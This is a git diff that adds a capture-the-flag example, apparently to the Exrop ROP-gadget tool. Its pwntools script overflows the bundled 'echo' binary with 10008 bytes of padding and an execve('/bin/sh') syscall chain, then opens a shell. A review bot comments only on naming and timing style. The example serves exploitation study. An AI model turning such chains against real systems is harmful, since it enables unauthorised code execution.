diff --git a/examples/CJ2017_echo/echo b/examples/CJ2017_echo/echo
new file mode 100755
index 0000000..d3b90cc
Binary files /dev/null and b/examples/CJ2017_echo/echo differ
diff --git a/examples/CJ2017_echo/exploit.py b/examples/CJ2017_echo/exploit.py
new file mode 100644
index 0000000..388a2cf
--- /dev/null
+++ b/examples/CJ2017_echo/exploit.py
@@ -0,0 +1,19 @@
+from pwn import *
+import time
+from Exrop import Exrop
+
+binname = "echo"
+libc = ELF(binname, checksec=False)
+bss = libc.bss()
+
+t = time.mktime(time.gmtime())
+rop = Exrop(binname)
+rop.find_gadgets(cache=True) # it's slow for first analyze keep waiting
+print("Analyzing done in {}s".format(time.mktime(time.gmtime()) - t))
+chain = rop.syscall(0x3b, ("/bin/sh",0,0), bss)
+chain.dump()
+buf = b"A"*10008
+pay = buf + chain.payload_str()
+p = process("./echo")
+p.sendline(pay)
+p.interactive()
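Review bot: The example binary is bound to a variable named `libc` (`libc = ELF(binname, checksec=False)`), but it is the `echo` ELF itself, not a C library, so the following `bss = libc.bss()` reads as if the address came from libc; `elf = ELF(binname, checksec=False)` and `bss = elf.bss()` would say what the object actually holds. The elapsed-time measurement in the new exploit.py uses `time.mktime(time.gmtime())`, which only has one-second resolution and goes through a calendar round-trip; `t = time.perf_counter()` with `time.perf_counter() - t` is the idiomatic way to time a duration such as the gadget search. The binary name is also spelled twice, once as `binname = "echo"` and once as `process("./echo")`; deriving the second from the first keeps the two from drifting apart if the example is renamed.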